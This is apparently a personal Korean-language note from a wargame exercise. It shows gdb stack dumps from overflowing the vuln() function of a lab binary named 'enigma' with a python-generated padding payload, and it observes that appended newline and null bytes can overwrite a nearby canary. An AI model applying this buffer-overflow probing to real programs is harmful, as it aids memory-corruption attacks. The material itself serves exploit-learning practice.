데이터를 특정한 곳에 갔다놓을때는 뒤에 널문자가 붙는듯.
따라서 ret 다음에 바로 canary가 존재할 경우에는 canary를 침범할 수 있으니 조심해야한다.
(gdb) x/100x $esp
0xbffca220: 0x00000000 0x530e0443 0x00000000 0x530e14b1
0xbffca230: 0x00000000 0x61616161 0x61616161 0x61616161
0xbffca240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca290: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca2f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca300: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca310: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca320: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca330: 0x61616161 0x62626262 0x63636363 0x0804000a
0xbffca340: 0x00031337 0xbffca368 0x008cb740 0x00000000
0xbffca350: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbffca360: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbffca370: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca380: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca390: 0x61616161 0x61616161 0x61616161 0x61616161
0xbffca3a0: 0x61616161 0x61616161 0x61616161 0x61616161
(gdb) she (python -c 'print "a"*260 + "bbbb" + "cccc"') > res
(gdb) r < res
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /home/cruel/tmp/enigma < res
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x576000
(no debugging symbols found)
(no debugging symbols found)
enigma : The brothers will be glad to have you!
you :
Breakpoint 3, 0x08048526 in vuln ()
(gdb) x/100x $esp
0xbf9d9180: 0x00000000 0x530e14b4 0x00000000 0x530e14c1
0xbf9d9190: 0x00000000 0x61616161 0x61616161 0x61616161
0xbf9d91a0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91b0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91c0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d91f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9200: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9210: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9220: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9230: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9240: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9250: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9260: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9270: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9280: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9290: 0x61616161 0x61616161 0x62626262 0x63636363
0xbf9d92a0: 0x0003000a 0xbf9d92c8 0x008cb740 0x00000000
0xbf9d92b0: 0x007a3828 0x00040000 0x00000000 0x007a3300
0xbf9d92c0: 0x00000000 0x0079eb64 0x61616161 0x61616161
0xbf9d92d0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92e0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d92f0: 0x61616161 0x61616161 0x61616161 0x61616161
0xbf9d9300: 0x61616161 0x61616161 0x61616161 0x61616161
데이터 + \x0a\x00을 추가하는듯.